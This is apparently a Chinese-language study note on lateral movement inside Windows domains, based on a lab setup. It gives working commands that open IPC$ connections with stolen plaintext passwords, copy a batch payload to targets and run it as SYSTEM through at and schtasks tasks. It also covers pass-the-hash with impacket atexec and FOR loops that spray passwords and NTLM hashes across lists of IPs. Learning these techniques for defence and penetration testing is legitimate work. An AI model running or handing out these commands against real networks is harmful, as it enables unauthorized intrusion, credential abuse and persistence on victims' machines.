【学习笔记】内网安全2-明文连接

思路

获取到某域主机权限->minikatz得到密码（明文，hash）->用到信息收集里面域用户的列表当做用户名字典->用到密码明文当做密码字典->尝试连接->创建计划任务（at|schtasks）->执行文件可为后门或者相关命令

利用

1.建立IPC连接到目标主机
2.拷贝要执行的命令脚本到目标主机
3.查看目标时间，创建计划任务（at、schtasks）定时执行拷贝到的脚本
4.删除IPC链接

建立IPC常见的错误代码

1. 5：错误访问，可能使用的不是管理员权限，需要先提升权限
2. 51：网络问题，windoows无法找到网络路径
3. 53：找不到网站路径，可能是IP地址错误，目标未开机，目标Lanmanserver服务未启动、有防火墙等问题
4. 67：找不到网络名，本地Lanmanworkstation服务未启动，目标删除ipc$
5. 1219：提供的凭据和已存在的凭据集冲突，说明已建立IPC$，需要先删除
6. 1326：账号密码错误
7. 1792：目标NetLogon服务未启动，连接域控常常会出现此情况
8. 2242：用户密码过期，目标有账号策略，强制定期更改密码

建立IPC失败的原因

1. 目标系统不是NT或以上的操作系统
2. 对方没有打开IPC$共享
3. 对方未开启139,445端口，或者被防火墙屏蔽
4. 输出命令，账号密码有错误

操作

明文-利用官方自带at（Windows<2012）
net use \192.168.3.21\ipc$ “Admin12345” /user:god.org\administrator #建立ipc连接；
copy add.bat \192.168.3.21\c$ #拷贝执行文件到目标机器
at \192.168.3.21 15:45 c:\add.bat #添加计划任务

明文-利用官方自带schtasks（Windows>2012）
net use \192.168.3.21\ipc$ “Admin12345” /user:god.org\administrator #建立ipc连接；
(dir \192.168.3.32\c$ 查看c盘内容)
copy add.bat \192.168.3.32\c$
schtasks /create /s 192.168.3.32 /ru “SYSTEM” /tn adduser /sc DAILY /tr c:\add.bat /F #创建adduser 任务对应执行文件
schtasks /run /s 192.168.3.32 /tn adduser /i #运行addusr任务
schtasks /delete /s 192.168.3.21 /tn addusr /f #删除addusr任务

HASH传递-利用第三方工具包impacket-atexec
atexec.exe ./administrator:[email protected] “whoami”
atexec.exe god/administrator:[email protected] “whoami”
atexec.exe -hashes :ccef208c6485269c20db2cad21734fe7 ./[email protected] “whoami”

利用for批量利用
FOR /F %%i in (ips.txt) do net use %%i\ipc$ “admin!@#45” /user:administrator #批量检测IP对应明文连接
FOR /F %%i in (ips.txt) do atexec.exe ./administrator:admin!@#45@%%i whoami #批量检测IP对应明文回显版
FOR /F %%i in (pass.txt) do atexec.exe ./administrator:%%[email protected] whoami #批量检测明文对应IP回显版
FOR /F %%i in (hash.txt) do atexec.exe -hashes :%%i ./[email protected] whoami #批量检测HASH对应IP回显版